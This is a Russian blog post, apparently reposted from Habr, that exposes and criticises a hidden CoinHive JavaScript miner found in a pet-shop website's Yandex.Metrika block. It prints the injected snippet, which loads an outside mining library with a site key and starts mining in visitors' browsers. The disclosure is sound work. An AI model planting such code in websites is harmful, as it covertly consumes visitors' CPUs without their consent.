logo

» » Скрытый JS-майнинг криптовалюты на сайте: альтернатива рекламе или новая чума

Скрытый JS-майнинг криптовалюты на сайте: альтернатива рекламе или новая чума

Скрытый JS-майнинг криптовалюты на сайте: альтернатива рекламе или новая чума

image
Буквально недавно промелькнула новость про Pirate Bay, который начал тестировать криптомайнер на jаvascript как альтернативу традиционной рекламной модели. Теперь же, судя по всему, нас ждет волна интеграции подобных скриптов в каждый мелкий магазинчик по продаже швейных принадлежностей. Только сегодня наткнулся на аналогичный скрипт, встроенный в код сайта zveruga.net — небольшой сети по продаже товаров для животных.


Зоомагазин и скрипты


Сегодня позвонил отец и сообщил, что у него Kaspersky Total Security ругается на скрипт для майнинга на сайте зоомагазина. И даже успел безуспешно поругаться по этому поводу с девушкой на первой линии поддержки. С предсказуемым результатом "Эээээ… Чего? Скрипты?". Решил ради интереса проверить — вдруг ложная эвристика сработала. Оказалось, что вполне корректно сработало — в коде главной страницы http://www.zveruga.net/ нашлась странная вставка:


<!-- Yandex.Metrika counter -->
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('PW7FI1VfOmLOORjnVtJqS62MdJTJFiOl');
    miner.start();
</script>
<script type="text/jаvascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter24517820 = new Ya.Metrika({id:24517820,
                    webvisor:true,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/jаvascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/24517820" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->

Кусок скрипта, активирующий майнинг оказался встроенным в блок Яндекс.Метрики. При активированном ghostery активности не проявлял, но стоило его временно отключить, как все ядрапроцессора немедленно нагружалось расчетами. Молодцы ребята из Mozilla. Теперь многопоточность!)




Зачем они жрут мои ресурсы?


Сам по себе подобный майнинг крайне малоэффективен. Плюс требует наличия открытой вкладки со скриптом, что делает осмысленным интеграцию только на туда, где пользователь проводит действительно много времени. Pornhub не подойдет, да. Потому есть несколько вариантов:


  1. Сайт кривой — у них даже HTTPS нет на странице авторизации! Взломали китайские боты и напихали скриптов куда попало.
  2. Реально решили заработать. Почему бы и не добавить каплю доходов в дополнение к рекламе.
  3. Админу не хватило на пиво.

В целом, мне кажется очень странным подобный способ получения прибыли. Сжирание процессора на 100% — это очень-очень грязный ход. Все же о таком следует предупреждать пользователя, который не ожидает такой подлости от браузера. В Kubuntu Linux тормоза интерфейса не ощущаются, видимо, из-за корректной приоритезации, а в Windows 7 система ощутимо начинает тупить. Немного страшно представить себе ситуацию, когда каждая вкладка начнет поедать системные ресурсы, пытаясь убить всех остальных.


Adblock для майнеров


В целом, вся эта фигня похожа на смесь очередной волны malware и поиска альтернативной модели заработка. Уже много клавиатур растоптано в сетевых баталиях на тему этичности блокировки рекламы. Вечная проблема столкновения интересов двух сторон — пользователь хочет качественный контент, создатель контента и сервиса хочет окупить свои затраты и немного заработать. И еще рекламные сети сбоку пристроились. С распространением блокировщиков рекламы ситуация становится все напряженнее. Кто-то уходит совсем, кто-то начинает показывать жалобных голодных котиков или переходить на модель платной подписки. Большинство тупо превращаются в сгенерированную копирайтерами за еду скриптами помойку с заголовками в духе Роспотребнадзор обвинил селфи в распространении вшей.


Возможность выкинуть на мороз рекламщиков крайне заманчиво выглядит для тех ресурсов, которых традиционно гнобят официальные власти — торрент-трекеры, продавцов неправильного укропа и тому подобные. Но и для обычных посещаемых ресурсов это может стать интересной альтернативой рекламной модели. Основные проблемы заключается в нескольких моментах:


  1. Деньги капают мизерными крохами с каждого пользователя.
  2. Вкладка со скриптом и браузер должны быть открыты максимально длительное время, что в принципе не очень характерно для современного варианта прыжков со страницы на страницу.
  3. Конкуренция за CPU между отдельными онлайн-сервисами. Процессор не резиновый, а каждый норовит выкрутить майнинг на полную мощность, чтобы успеть урвать хоть что-то за короткое время.

Во все это безобразие уже включились антивирусы. С одной стороны, они вроде как на стороне огромной массы полуграмотных пользователей. С другой — что-то очень дофига они стали себе позволять в плане того, что может делать пользователь, а что нет, прорастая во все возможные часть операционной системы.


Кажется, нас ждет интересное ближайшее будущее. Ждем ответ от браузеров, блокирующих исполнение кода на неактивных вкладках. И еще очередного слоя блокировщиков. Единичные пользователи с радикальным NoScript вероятно опять пропустят все веселье.

Источник - Хабра.
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо зайти на сайт под своим именем.

комментариев

Ваше имя: *
Ваш e-mail: *
Введите два слова, показанных на изображении:

Последнее на сайте

21:44
Похищение биткойнов / Bitcoin Heist / Sieu Trom (2016)
14:51
Okolofutbola-ICO для съемок сиквела
11:48
Создатели фильма «ОколоФутбола» проводят ICO для съемок сиквела
09:41
Криптовалютная биржа Tidex.com - обзор биржи с waves-ассетами
22:22
Закономерно или нет: надвигающийся форк биткоина влияет на его курс
22:11
12 октября состоится вечерняя лекция «Криптовалюты: от сотворения Биткоина до наших дней»
16:02
Криптовалютная биржа HitBTC - краткая информация
08:24
Документальный фильм Bitcoin — Shape The Future
обновлено
04:09
Великое Криптослияние: как криптовалюты учат «говорить» друг с другом
20:26
Russian Вlockchain Week: интервью со спикерами
обновлено
12:15
Цифровое наследство: реальность?
20:18
PAYFAIR - децентрализованная платформа условного депонирования
21:31
Lescoin - DAO по заготовке, обработке и международной торговле древесиной.
19:55
Инвестиционная система «Восход» приняла на рассмотрение проект развития ЛПК Дальнего Востока
12:26
Интервью В.Бутерина южнокорейским СМИ
21:31
Скрытый JS-майнинг криптовалюты на сайте: альтернатива рекламе или новая чума
17:03
DomRaider - платформа для проведения блочных аукционов в режиме реального времени.
13:09
Zonto.world - многофункциональная социальная сеть
04:17
Криптовалютная биржа Bitfinex.com - обзор одной из крупнейших криптобирж
17:29
26 и 27 октября При поддержке Российского экономического университета им. Г.В. Плеханова (РЭУ) в Москве пройдет Russian blockchain week 2017
Все обновления